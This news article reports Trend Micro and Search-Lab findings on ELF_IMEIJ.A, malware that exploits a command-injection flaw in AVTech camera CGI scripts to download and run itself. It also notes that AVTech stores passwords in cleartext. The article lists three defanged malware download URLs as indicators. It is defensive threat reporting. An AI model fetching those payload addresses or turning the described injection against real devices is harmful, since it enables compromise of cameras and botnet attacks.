Trend Micro is reporting a new threat to Linux-based Internet of Things (IoT) devices that is specifically able to exploit a specific vulnerability in surveillance cameras made by AVTech.
The threat is called ELF_IMEIJ.A and was originally uncovered by Search-Lab in October 2016 and reported to AVTech. Trend Micro said Search-Labs did not received a response regarding the issue. Much like Mirai, ELF_IMEIJ.A the malware searches for unprotected IoT devices, in this case a camera.
The attacker uses cgi-bin scripts to randomly ping IP addresses searching for a device that is vulnerable.
“Specifically, it exploits CloudSetup.cgi, the reported AVTech CGI Directory vulnerability, to execute a command injection that triggers the malware download. The attacker tricks the device into downloading the malicious file and changes the file's permissions to execute it locally,” Trend wrote.
Search-Labs noted that every user password for the AVTech products is stored in clear text and that an attacker with access to the device itself can easily obtain the full list of passwords.
“By exploiting command injection or authentication bypass issues, the clear text admin password can be retrieved,” Search-Labs initial report on the malware stated.
The points of entry area IP cameras, CCTV equipment and network recorders that support AVTech's cloud environment. Once installed the malware is able to execute shell commands, initiate DDoS attacks (like Mirai) and use the infected devices to spread the malware to others on the network.
Trend noted the IP addresses, all registered in South Korea, from which the malware can be downloaded, are:
There are three IP addresses where ELF_IMEIJ.A can be downloaded, and they are hosted on two separate ISPs.
· xxp://172.247.116.3:8080/Arm1
· xxp://172.247.116.21:85/Arm1
· xxp://192.154.108.2:8080/Arm1
Search-Labs reported that AVTech has 130,000 devices connected to the intenet.
AVTech was contacted by SC Media, but did not respond.